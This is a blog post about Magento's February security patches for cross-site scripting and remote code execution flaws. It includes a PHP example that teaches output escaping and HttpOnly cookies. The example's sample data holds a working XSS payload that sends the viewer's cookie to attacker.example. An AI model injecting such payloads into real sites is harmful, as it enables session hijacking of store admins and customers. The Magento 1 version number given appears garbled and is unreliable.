Towards the end of last month, Magento released a number of updates that contain patches for security vulnerabilities in Magento 2. Magento eCommerce merchants should install the security updates at their earliest convenience. The patches fix cross-site scripting vulnerabilities and remote code execution vulnerabilities that could be used by an attacker to steal sensitive data or to target the store and its customers with further attacks.
If you are a Magento 2 Open Source user, the full versions and patches can be downloaded from the Magento Open Source Download Page along with instructions for installing patches and upgrading. Magento Commerce users can find more information in the Downloads section of their account dashboard.
Magento versions that include the fixes are Magento Open Source 2.2.3 and Magento Open Source 2.1.12. Magento 2.0 was also updated with Magento Open Source 2.0.18, and it should be noted that this is the final release of the 2.0 line, which will no longer be supported.
Magento 1 users should install Magento Open Source 18.104.22.168 or patch with SUPEE-10415, which fixes a similar range of security vulnerabilities.
These are serious vulnerabilities and we encourage Magento users to update or apply the patches as soon as possible.
Cross-site scripting attacks use scripts injected into the front-end of a web application to execute arbitrary code when a page is loaded by a web browser. For instance, an attacker might inject code that sends the cookie of a logged-in user to their server, enabling them to access a store as that user.
Depending on the privileges of the user who loads the infected page, a cross-site scripting attack can be used to take over a site: consider the consequences if an admin user has their authentication cookie stolen.
The Magento patches released in February include fixes for a cross-site scripting vulnerability that could allow an attacker to inject code in a storefront form field that would be executed in the context of the admin panel. Less serious cross-site scripting vulnerabilities fixed by the patches include vulnerabilities that allowed a user to insert code in their address or other customer information.
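The storefront-to-admin scenario above comes down to two controls a Magento developer can verify in their own templates: untrusted customer data must be HTML-encoded at output time, and the admin session cookie should be unreadable by script. The following is an added example written for this post, not Magento's own code or its Escaper class; the customer record and the template fragment are constructed, and the PHP built-ins used (htmlspecialchars, session_set_cookie_params) are standard PHP.

```php
<?php
// Added example (not Magento code): rendering an untrusted customer field
// safely and keeping the admin session cookie out of reach of page scripts.
declare(strict_types=1);

// Constructed: an address field as a malicious customer might submit it.
// The payload matches the attack described in the post: send the viewer's
// cookie to a server the attacker controls.
$customer = [
    'name'   => 'Jane Doe',
    'street' => '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">',
];

// Vulnerable: the field is concatenated straight into the admin page markup,
// so the browser of whichever admin views this customer executes the payload.
function renderAddressUnsafe(array $customer): string
{
    return '<td>' . $customer['street'] . '</td>';
}

// Hardened: every untrusted value is HTML-encoded when it is written out.
// ENT_QUOTES also encodes single quotes, so the value stays inert inside
// single-quoted attributes; ENT_SUBSTITUTE avoids an empty result on invalid UTF-8.
function escapeHtml(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

function renderAddressSafe(array $customer): string
{
    return '<td>' . escapeHtml($customer['street']) . '</td>';
}

// Defence in depth: mark the session cookie HttpOnly (plus Secure and SameSite)
// so that a script which does run cannot read it through document.cookie.
// Must be called before session_start(); the array form needs PHP >= 7.3.
function configureSessionCookie(): void
{
    session_set_cookie_params([
        'lifetime' => 0,
        'path'     => '/',
        'secure'   => true,
        'httponly' => true,
        'samesite' => 'Lax',
    ]);
}

// Crude self-check: did a raw <img tag survive into the output? After encoding,
// the text "onerror" is still present but sits inside text content, not a tag.
function containsRawImgTag(string $html): bool
{
    return stripos($html, '<img') !== false;
}

echo 'unsafe: ' . renderAddressUnsafe($customer) . PHP_EOL;
echo 'safe:   ' . renderAddressSafe($customer) . PHP_EOL;
var_dump(containsRawImgTag(renderAddressUnsafe($customer)));
var_dump(containsRawImgTag(renderAddressSafe($customer)));
```

Run it with `php example.php`. The first var_dump reports true and the second false, which is the check to repeat for any template that prints customer-supplied data in the admin panel. The HttpOnly flag does not stop the injected script from acting on the admin's behalf while the page is open, so it complements output encoding rather than replacing it.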
Remote Code Execution
The patches also fixed a potential remote code execution vulnerability that may allow an administrator with limited privileges to execute code during the “CMS image or media upload process.”
A number of other less serious — but still dangerous — vulnerabilities were also fixed. You can see a full list in this post on the Magento Security Center.
In addition to security patches, the new releases include a number of enhancements, including support for upcoming changes to USPS shipping, support for Elasticsearch 5.0, and enhancements to ACL control for cache management.